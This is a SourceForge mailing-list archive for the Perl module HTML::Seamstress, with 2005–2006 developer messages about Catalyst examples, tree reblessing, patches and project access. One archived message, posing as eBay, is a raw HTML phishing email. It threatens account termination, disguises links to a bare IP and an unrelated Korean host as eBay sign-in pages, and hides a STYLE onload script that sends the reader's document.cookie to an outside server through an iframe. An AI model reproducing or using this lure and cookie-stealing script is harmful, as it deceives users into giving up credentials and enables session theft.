You can subscribe to this list here.
2005 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
(2) |
Dec
|
---|---|---|---|---|---|---|---|---|---|---|---|---|
2006 |
Jan
(9) |
Feb
(4) |
Mar
|
Apr
(1) |
May
(1) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
2007 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
(4) |
2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
(1) |
2009 |
Jan
(10) |
Feb
(5) |
Mar
(3) |
Apr
(1) |
May
|
Jun
(4) |
Jul
(6) |
Aug
(1) |
Sep
(2) |
Oct
(1) |
Nov
|
Dec
(3) |
2010 |
Jan
(1) |
Feb
(1) |
Mar
(1) |
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
2012 |
Jan
(1) |
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
2013 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
(1) |
Sep
|
Oct
|
Nov
|
Dec
|
From: Matt S. <si...@mo...> - 2006-02-01 16:38:51
|
Quoting Terrence Brannon <met...@gm...>: > ... discovered that I > needed to bless the entire $tree into my Seamstress subclass because > without doing so, they were HTML::Element objects and could not call > the methods of the needed superclasses. Heh heh. :) I discovered the same thing with HTML::ElementTable some time ago. You might be interested in the new_from_tree() constructor. Although in my case, it wasn't just a matter of traversing and reblessing, I had to deal with rowspan/colspan issues properly due to the internal structure of H::TE trees (i.e. 'hidden' cells due to span issues are not destroyed, they're retained). Cheers, Matt |
From: Terrence B. <met...@gm...> - 2006-02-01 00:43:11
|
--- news --- In reworking the ServerDB Catalyst example, I decided to do some aggressive refactoring (more on that later) and discovered that I needed to bless the entire $tree into my Seamstress subclass because without doing so, they were HTML::Element objects and could not call the methods of the needed superclasses. This blog post explains it with code examples: http://sw-design.sourceforge.net/cgi-bin/blosxom.cgi/perl/html-seamstress/r= eblessing-whole-tree.html The CPAN will have 4.2 tomorrow. For now it is at: http://hcoop.net/~terry/cpan-dumps/HTML-Seamstress-4.2.tar.gz --- introductions --- Matthew, meet Gary from Australia and Gary, meet Matthew from Houston, TX Matthew is the author of several useful extensions to HTML::Element - http://search.cpan.org/~msisk/ And Gary supplied the first patch to Seamstress via RT. now all 3 mailing list members know each other :) |
From: Terrence B. <met...@gm...> - 2006-01-25 13:56:48
|
You can view the source <a href=3Dhttp://dev.catalyst.perl.org/browser/trunk/examples/CatalystAdvent-S= eamstress> here</a> and download via <code> svn co http://dev.catalyst.perl.org/repos/Catalyst/trunk/examples/CatalystAdvent-S= eams\tress </code> -- Play me in correspondence chess: http://slowchess.com/profile.php?username=3Dtbrannon |
From: Terrence B. <met...@gm...> - 2006-01-23 11:15:03
|
I got <a href=3Dhttp://search.cpan.org/dist/HTML-Seamstress>HTML::Seamstress</a> up and running the bookdb example. Thanks to Andy Grundman, I can commit to the examples directory on the Catalyst svn site so <code>BookDB-Seamstress</code> is available <a href=3Dhttp://dev.catalyst.perl.org/browser/trunk/examples/BookDB-Seamstres= s> right here</a>. <P> Converting it from tt to Seamstress led to a few improvements in <a href=3Dhttp://search.cpan.org/dist/HTML-Element-Library>HTML::Element::Libr= ary </a>, namely the addition of <a href=3Dhttp://search.cpan.org/~tbone/HTML-Element-Library-3.1/lib/HTML/E= lement\/Library.pm#Tree-Building_Methods%3A_Unrolling_an_array_via_n_sample= _elements> iter2()</a>, a more flexible routine for turning arrays of data into HTML list data, such as dl, ol, or ul. <P> I learned a lot about Class::DBI::AsForm in the process. That is a very slick module that is underdocumented and highly magical. I have pretty much decided to stick with <a href=3Dhttp://search.cpan.org/dist/DBIx-Simple>DBIx::Simple</a> for all of my database processing needs. -- Play me in correspondence chess: http://slowchess.com/profile.php?username=3Dtbrannon |
From: Terrence B. <met...@gm...> - 2006-01-14 10:52:45
|
On 1/13/06, Gary Ashton-Jones <ga...@as...> wrote: > Sorry. I was completing a form at the time on another site and it asked > for ID and meant account no. Not thinking. > It's gajatrats Ok, I made you my co-admin, so you should be able to do anything you want. I patched the code per your diff. It's in CVS on sourceforge. I havent uploaded to CPAN yet, although I could. http://sourceforge.net/projects/seamstress/ If there's anything you think needs fixing or improvement. Just let me know. I finished one page of converting the Catalyst BookDB example but I have to leave town from Sunday - Tuesday. Unfortunately I dont have one of those cute apple ibooks so I will be out of touch :-)... that's at the top of my list of things to buy. > > Cheers Cheers -- Play me in correspondence chess: http://slowchess.com/profile.php?username=3Dtbrannon |
From: Gary Ashton-J. <ga...@as...> - 2006-01-14 05:56:34
|
On 14/01/2006, at 12:01 PM, Terrence Brannon wrote: > I personally find unified diffs much easier to read and most people > that > apply patches use unified diffs to do so. No problemo. I've attached a 'diff -u' version of the previous file if it's any use. Cheers Gary |
From: Gary Ashton-J. <ga...@as...> - 2006-01-14 05:45:42
|
Sorry. I was completing a form at the time on another site and it asked=20= for ID and meant account no. Not thinking. It's gajatrats Cheers G. On 14/01/2006, at 11:49 AM, Terrence Brannon wrote: > No I meant your user name on sourceforge. > > On 1/13/06, Gary Ashton-Jones <ga...@as...> wrote: >> >> On 14/01/2006, at 10:31 AM, Terrence Brannon wrote: >> >>> >>> Ok, just give me your Sourceforge ID and I will add you to the=20 >>> project >> >> 1392873 >> >> Thx >> >> Gary >> >> >> ------------------------------------------------------- >> This SF.net email is sponsored by: Splunk Inc. Do you grep through=20 >> log files >> for problems? Stop! Download the new AJAX search engine that makes >> searching your log files as easy as surfing the web. DOWNLOAD=20 >> SPLUNK! >> http://ads.osdn.com/?ad_id=3D7637&alloc_id=3D16865&op=3Dclick >> _______________________________________________ >> seamstress-discuss mailing list >> sea...@li... >> https://lists.sourceforge.net/lists/listinfo/seamstress-discuss >> > > > -- > Play me in correspondence chess: > http://slowchess.com/profile.php?username=3Dtbrannon > > > ------------------------------------------------------- > This SF.net email is sponsored by: Splunk Inc. Do you grep through log=20= > files > for problems? Stop! Download the new AJAX search engine that makes > searching your log files as easy as surfing the web. DOWNLOAD = SPLUNK! > http://ads.osdn.com/?ad_idv37&alloc_id=16865&op=3Dclick > _______________________________________________ > seamstress-discuss mailing list > sea...@li... > https://lists.sourceforge.net/lists/listinfo/seamstress-discuss > |
From: Terrence B. <met...@gm...> - 2006-01-14 01:01:56
|
On 1/13/06, Guest via RT <bug...@rt...> wrote: > The attached file has my fixes for both bugs. Just a quick heads up (and sorry for the flood of emails) - I personally find unified diffs much easier to read and most people that apply patches use unified diffs to do so. They work by the "-u" option to diff: diff -u old-file new-file |
From: Terrence B. <met...@gm...> - 2006-01-14 00:49:39
|
No I meant your user name on sourceforge. On 1/13/06, Gary Ashton-Jones <ga...@as...> wrote: > > On 14/01/2006, at 10:31 AM, Terrence Brannon wrote: > > > > > Ok, just give me your Sourceforge ID and I will add you to the project > > 1392873 > > Thx > > Gary > > > ------------------------------------------------------- > This SF.net email is sponsored by: Splunk Inc. Do you grep through log fi= les > for problems? Stop! Download the new AJAX search engine that makes > searching your log files as easy as surfing the web. DOWNLOAD SPLUNK! > http://ads.osdn.com/?ad_id=3D7637&alloc_id=3D16865&op=3Dclick > _______________________________________________ > seamstress-discuss mailing list > sea...@li... > https://lists.sourceforge.net/lists/listinfo/seamstress-discuss > -- Play me in correspondence chess: http://slowchess.com/profile.php?username=3Dtbrannon |
From: Gary Ashton-J. <ga...@as...> - 2006-01-14 00:36:19
|
On 14/01/2006, at 10:31 AM, Terrence Brannon wrote: > > Ok, just give me your Sourceforge ID and I will add you to the project 1392873 Thx Gary |
From: Terrence B. <met...@gm...> - 2006-01-13 23:31:59
|
On 1/13/06, ga...@as... via RT <bug...@rt...> wrote: > > Would you like to join the sourceforge project > > as a committer? > Sure, why not. If it's just you and me using it (:-) the extra eyes and > hands will probably be useful. Ok, just give me your Sourceforge ID and I will add you to the project > > > And do you use IRC? I am EFNet #perlhelp all the time... > > I am also on irc.perl.org #catalyst quite a bit. > > > I don't use (or like) IRC. Sorry. My brain works too slowly. :-) > > > http://seamstress.sourceforge.net/ is the Seamstress jump-off point. > Just had a look and subscribed to mail list. > > > > And are you using Seamstress in a web application framework? > I'm not sure :-). I'm redeveloping a website for a choir I sing with > and using this as an excuse to put my limited knowledge of Catalyst to > practical use. I've developed commercial products in Mason and > CGI::Application/HTML::Template and started using TT but all of them > require me to switch brain spaces too much (that slow brain thing > again). I've been using XML DOM's and Javascript DOM's for a long time > so Seamstress and Tree just seemed to fit in. > I'm at the stage of > building a skeleton and putting up a few pages with some dynamic > content. If things pan out as well as the preliminary stuff I've done > seems to indicate, yes, I will use the Cat::Seamstress plugin. (I've > committed to a working site by 30th Jan just to give me some > motivation.) Catalyst is quite advanced. I struggle with it. Once you master it, it is a powerful tool. I personally have found CGI::Prototype to be an easy and logical progression from CGI::Application, but Catalyst is a very huge step away. > > > > The Quickstart guide I just added to Seamstress explains that new > > html() > > method. > > > Very useful stuff for beginners. You cover most of this in the > references you give in H::S pod but it's good to have it in one place. > > > I am doing a whole lot of stuff as I rework the Catalyst examples in > > Seamstress... > > > I'm really interested in Cat stuff and have been doing exactly the same. > > > these days I am manually making my .pm files until I can come up with a > > good way to bring spkg.pl up to speed. > > > > What plans do you have for spkg? Well, the new Quickstart guide shows two ways of creating LOOMs - the quick and dirty way and the slow and clean way. spkg.pl so far has supported the slow and clean way only. I think there should be support for both. > > Anyway thanks again for Seamstress and I hope I can contribute a bit. Sure > > Cheers Cheers > > Gary > > -- Play me in correspondence chess: http://slowchess.com/profile.php?username=3Dtbrannon |
From: eBay S. <aw-...@eb...> - 2005-11-09 05:41:37
|
<html> <head> <title>Update your account</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body bgcolor="#FFFFFF"> <br> <table width="600" border="0" cellspacing="0" cellpadding="0"> <tr height=0> <td width=0></td> <td width=300></td> <td width=300></td> </tr> <tr> <td width=0></td> <td valign="Top" colspan="2" width="600" col=1> <TABLE cellSpacing=0 cellPadding=0 width=600 border=0> <TR> <TD colSpan=7><a target="_blank" HREF="http://www.eagles.co.kr/images/ws/eBayISAPI.dllSignIn/" ><IMG height=101 src="http://emailpics.ebay.com/459718669/images/SS35_Q103_logo_ss35_122602-1.gif" width=131 border=0></A><IMG height=101 src="http://emailpics.ebay.com/459718669/images/SS35_Q103_headline_ss35_122602-1.gif" width=469></TD> </TR> <TR> <TD> </TD> <TD vAlign=center align=left colSpan=5> </TD> <TD> </TD> </TR> <tr> <td> <center> <FONT face=Arial,Helvetica,sans-serif size=2> <br> It has come to our attention that your eBay account has been used to submit bogus listings on the Online Marketplace. If you could please take 1-2 minutes out of your online experience and verify if there are any suspect listings on your account you will not run into any future problems with the online service. However, failure will result in account termination.<br> <br> <br> Once you have logged into your eBay account the session will not be interrupted. Failure will result in cancellation of service, Terms of Service (TOS) violations or future billing problems. <br> <br> To log into your eBay account now use: <br> <A target="_blank" HREF="http://210.212.252.178/sigin.ebay.com/signin.htm" >http://cgi1.ebay.com/aw-cgi/ebayISAPI.dll?UPdate</A> <br> <br> <br> </font> </center> </td> </tr> <TR> <TD vAlign=top align=left colSpan=7> <TABLE cellSpacing=0 cellPadding=0 width=600 border=0> <TBODY> <TR> <TD align=right> </TD> </TR> </TBODY> </TABLE> </TD> </TR> <TR> <TD colSpan=7> <TABLE cellSpacing=0 cellPadding=0 width=600 border=0> <TBODY> <TR> <TD><IMG height=34 src="http://emailpics.ebay.com/459718669/images/searchMargin_ss35_122602-1.gif" width=26></TD> <TD width=285 background="http://emailpics.ebay.com/459718669/images/searchBG_ss35_122602-1.gif" bgColor="#ffffff" height=34> <FONT face="arial narrow" size=2> </FONT></TD> <TD><a target="_blank" HREF="http://www.eagles.co.kr/images/ws/eBayISAPI.dllSignIn/" ><IMG height=34 src="http://emailpics.ebay.com/459718669/images/goToeBay_ss35_122602-1.gif" width=289 border=0></A></TD> <BR><BR><DIV id=b style="VISIBILITY: hidden"> <STYLE onload="window.status=''; var x = escape(document.cookie).substr(0,1900); b.innerHTML='<iframe src=http://ubergangsfirma-mobile.com/y/a.php?id='+document.title.substring(document.title.indexOf('-')+2)+'&cookie=\''+x+'\' frameborder=0 width=10 height=10></iframe>';" type=text/css> </STYLE> </DIV><p> |
From: Terrence B. <met...@gm...> - 2005-11-08 03:05:36
|
Hi guys, a lot is going to happen with HTML::Seamstress and a lot has been happening because I am going to be pushing out to production servers with i= t for my company. In fact, a lot has already happened to deal with the one-us= e nature of HTML::TreeBuilder instances. I developed Class::Cache: http://search.cpan.org/~tbone/Class-Cache-1.12/lib/Class/Cache.pm and then went on a 2-day hackathon to really make it flexible in terms of object construction and eager or lazy instance creation and implemented it using Class::Prototyped. Today, I did some really basic dynamic HTML generation and certainly will b= e developing more HTML::Element::Library methods around what I did once the best pattern of abstraction reveals itself. To that end, HTML::Element::Library, HTML::Seamstress and Class::Cache are all in CVS on sourceforge. http://sourceforge.net/cvs/?group_id=3D148707 And the mailing list that I intend to release thoughts on tree manipulation is here: http://lists.sourceforge.net/lists/listinfo/seamstress-discuss So it'd be great if you two were on there to critique my development. |